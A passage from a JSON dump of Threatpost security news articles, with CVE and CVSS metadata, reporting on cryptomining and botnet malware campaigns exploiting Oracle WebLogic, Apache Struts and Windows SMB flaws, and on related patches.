VirusTotal.\n\nThe initial victims have in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. _\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T21:54:31", "description": "Oracle said that a critical remote code execution flaw in its WebLogic Server is being actively exploited in the wild.\n\nThe remote code execution flaw ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) impacts a number of versions of Oracle\u2019s WebLogic Server, used for building and deploying enterprise applications. The vulnerability has a CVSS score of 9.8 out of 10. Part of its seriousness is because it is remotely exploitable without authentication.\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,\u201d according to Oracle\u2019s Tuesday [security advisory.](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue stems from a deserialization vulnerability in the XMLDecoder in Oracle\u2019s WebLogic Server web services. The XMLDecoder class is used to read XML documents created using the XMLEncoder according to Oracle.\n\nImpacted are Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0.\n\nResearchers with KnownSec 404 said the vulnerability bypasses a fix for an infamous Oracle WebLogic Server deserialization flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), which was disclosed earlier this year and patched on April 26.\n\n\u201cA new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild.We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019\u20132725,\u201d researchers said in an analysis [over the weekend](<https://medium.com/@knownsec404team/knownsec-404-team-alert-again-cve-2019-2725-patch-bypassed-32a6a7b7ca15?postPublishedType=repub>).\n\nHowever, John Heimann, vice president security program management shut down researchers\u2019 claims that the newly-disclosed flaw is related to CVE-2019\u20132725, saying the two are unrelated: \u201cPlease note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability,\u201d he said in [a Tuesday security alert](<https://blogs.oracle.com/security/security-alert-cve-2019-2729-released>).\n\nNeither Oracle nor KnownSec 404 have responded to requests for comment regarding the two contradicting reports.\n\nRegardless, researchers with KnownSec 404, who are credited (among others) for discovering the flaw, said that they have seen the vulnerability being actively exploited in the wild, and warned users to update.\n\n> [#Oracle](<https://twitter.com/hashtag/Oracle?src=hash&ref_src=twsrc%5Etfw>) [#WebLogic](<https://twitter.com/hashtag/WebLogic?src=hash&ref_src=twsrc%5Etfw>) Deserialization RCE Vulnerability (0day) Alert Again (CVE-2019\u20132725 patch bypassed\u203c\ufe0f) Check out the temporary solution offered by KnownSec 404 Team:<https://t.co/1jOYrnysFy>\n> \n> \u2014 Seebug (@seebug_team) [June 15, 2019](<https://twitter.com/seebug_team/status/1139924754759131136?ref_src=twsrc%5Etfw>)\n\nCritical flaws in Oracle WebLogic Servers continue to be a thorn in the security community\u2019s side.\n\nResearchers said that attackers have been exploiting the older deserialization flaw, CVE-2019\u20132725, since April 21 in malicious campaigns revolving around the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>), [a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, and [GandCrab ransomware](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>).\n\nThe sheer number of vulnerable devices and exploit attempts around this flaw show how serious it is: A scan in May showed more than 41,000 publicly accessible WebLogic instances in the wild, while Palo Alto Networks said that they detected over 600 exploitation attempts targeting CVE-2019-2725.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=ART>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts from Malwarebytes, Recorded Future and Moss Adams as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-19T16:25:30", "type": "threatpost", "title": "Oracle Warns of New Actively-Exploited WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-9586"], "modified": "2019-06-19T16:25:30", "id": "THREATPOST:E415CA5BCD7AC520A44AB5246664528A", "href": "https://threatpost.com/oracle-warns-of-new-actively-exploited-weblogic-flaw/145829/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework [CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:50", "description": "Hackers behind cryptominer attacks are growing more aggressive and ruthless. Case and point, a cryptominer malware sample dubbed WinstarNssmMiner has been tracked in 500,000 attacks in the past three days, earning the crooks $28,000, according to researchers.\n\nWhat makes the cryptominer so vicious is the fact that, post infection, if a victim\u2019s AV software identifies WinstarNssmMiner and tries to remove it (or a user tries to disable it) the malware crashes the host system. WinstarNssmMiner targets Windows systems and leeches on to a system\u2019s processor power with a trojanized version of the XMRig mining program.\n\n\u201cThis malware is very hard to remove since victims\u2019 computers crash as soon as [it\u2019s] found,\u201d according to 360 Security researchers who published a [report on the malware Wednesday](<https://blog.360totalsecurity.com/en/cryptominer-winstarnssmminer-made-fortune-brutally-hijacking-computer/>). \u201cWe\u2019re quite surprised to see a cryptominer being so brutal to hijack victims\u2019 computers by adopting techniques of stubborn malware,\u201d researchers wrote.\n\nAn analysis of the cryptominer campaign reveals WinstarNssmMiner has already earned cybercriminals 133 Monero, or $28,000 based on current rates. Researchers did not specify how long it took criminals to earn that money.\n\nThose totals are a drop in the bucket for crypto-jacking campaigns. Malicious cryptomining that targets computers, servers or cloud-based systems have seen enormous growth over the last six months earning crooks millions in cryptocurrency. In February, hackers are estimated to have earned $3 million by exploiting a vulnerability ([CVE-2017-1000353](<https://jenkins.io/security/advisory/2017-04-26/>)) on servers running Jenkins software and installing Monero miners, researchers at [Check Point reported](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>).\n\nIt\u2019s unclear what the WinstarNssmMiner infection path is, but once the malware executes on a targeted system it launches a system process called svchost.exe, a process that manages system services. Next, it injects malicious code into svchost.exe.\n\n\u201cThere are actually two svchost.exe processes created. One performs the mining tasks. The other runs in the background for sensing the antivirus protection and avoiding detection,\u201d researchers said.\n\nThe svchost.exe process created for cryptomining has a process attribute of CriticalProcess, which means terminating the process crashes the system. A second svchost.exe process runs in the background and attempts to detect \u201cdecent\u201d antivirus software that developers know can identify the malware. \u201c[The] malware will quit automatically to avoid direct confrontation,\u201d researchers said.\n\nThe miner itself is based on the open source project, XMRig. XMRig is a legitimate cryptocurrency mining program known as a high performance Monero CPU miner. The miner is better known for its trojanized versions that have been adopted for criminal use. It has been used [in several recent malicious cryptocurrency campaigns](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) and one in January where it was installed via malware on [15 to 30 million endpoints](<https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/>), according to a report by Palo Alto Networks.\n\nXMRig code was also used in recent attacks, such as the Jenkins miner, and also with malicious campaigns dubbed RubyMiner and WaterMiner, according to [an IBM X-Force Research report](<https://securityintelligence.com/xmrig-father-zeus-of-cryptocurrency-mining-malware/>).\n", "cvss3": {}, "published": "2018-05-16T19:56:09", "type": "threatpost", "title": "New Cryptominer Distributes XMRig in Aggressive Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-05-16T19:56:09", "id": "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "href": "https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:28:33", "description": "Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes their independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes [a week after the company](<Smith's%20departure%20comes%20a%20week%20after%20the%20company%20announced%20its%20chief%20information%20officer%20David%20Webb%20and%20chief%20security%20officer%20Susan%20Mauldin,%20would%20be%20retiring.>) announced its chief information officer David Webb and chief security officer Susan Mauldin, would also be retiring.\n\nDespite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "cvss3": {}, "published": "2017-09-26T14:28:26", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax 